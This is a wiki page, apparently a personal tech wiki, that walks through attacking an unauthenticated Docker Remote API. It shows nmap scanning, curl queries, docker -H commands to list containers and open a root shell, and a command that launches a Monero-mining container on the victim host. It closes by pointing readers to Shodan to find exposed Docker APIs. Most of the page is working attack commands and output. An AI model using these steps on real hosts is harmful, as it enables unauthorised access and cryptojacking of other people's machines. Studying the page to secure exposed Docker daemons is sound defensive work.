====== Docker - Security - Attack Docker exposed API ======

If you have enabled Docker Remote API, per [[Docker:Enable Docker Remote API|Enable Docker Remote API]], you may be vulnerable to attacks.

----

Information Gathering & Enumeration

===== Do a port scan =====

<code bash>
sudo nmap -sS -T5 192.168.1.118 -p-Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:37 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00076s latency).
Not shown: 65498 closed ports, 35 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
1234/tcp open  docker
MAC Address: 0C:01:67:8A:63:F2 (Oracle VirtualBox virtual NIC)
</code>

I had to scan more ports that the default top 1000 because the docker API port is not included :(
Ok then, what about service detection?

<code bash>
nmap -sTV -p 1234 192.168.1.118

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:43 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00038s latency).
PORT     STATE SERVICE    VERSION
1234/tcp open  18.06.0-ce Docker

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds
</code>

This confirm that we are dealing with Docker.

nmap also discovered the exact version of Docker.  If we want to confirm it manually we can issue a GET request to the endpoint located at: <nowiki>http://<IP>:1234/version</nowiki>.

<code bash>
curl -s http://192.168.1.118:1234/version | python -m json.tool
</code>

<WRAP info>
**NOTE:** Claudio Criscione wrote a nmap script to do this ([[https://github.com/paradoxengine|His GitHub page]]).
</WRAP>

----

===== Test the exposed API using the docker CLI =====

<code bash>
docker -H 192.168.1.118:1234 info
</code>

----

==== Gather Information ====

Are there some containers running?

<code bash>
docker -H 192.168.1.118:1234 ps
</code>

----

Are there some stopped containers?

<code bash>
docker -H 192.168.1.118:1234 ps -a
</code>

----

What are the images pulled on the host machine?

<code bash>
docker -H 192.168.1.118:1234 images
</code>

----

===== Accessing the container =====

Spawn a bash shell:

<code bash>
docker -H 192.168.1.118:1234 exec -it <container name> /bin/bash
</code>

Check ownership:


<code bash>
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
</code>

<WRAP info>
**NOTE:**  Already root!!!

The default user inside a container is **root**.

Once inside a container you can start digging for some useful information.
</WRAP>

----

===== Launching other containers =====

A funny thing that you can do is launch other containers, this is not very stealthy but can be useful.

Following the crypto-mining trend, this blog post explains how to mine monero with docker:

  * https://getmonero.org/resources/user-guides/mining_with_xmrig_and_docker.html

You can have a look inside the Dockerfile at this link from DockerHub.

Easily you could launch a mining container with the following command:

<code bash>
docker -H 192.168.1.118:1234 run --restart unless-stopped --read-only -m 50M -c 512 bitnn/alpine-xmrig -o POOL01 -o POOL02 -u WALLET -p PASSWORD -k
</code>

----

===== Find exposed Docker API =====

  * https://www.shodan.io/
    * Search for:  **Product:"Docker"**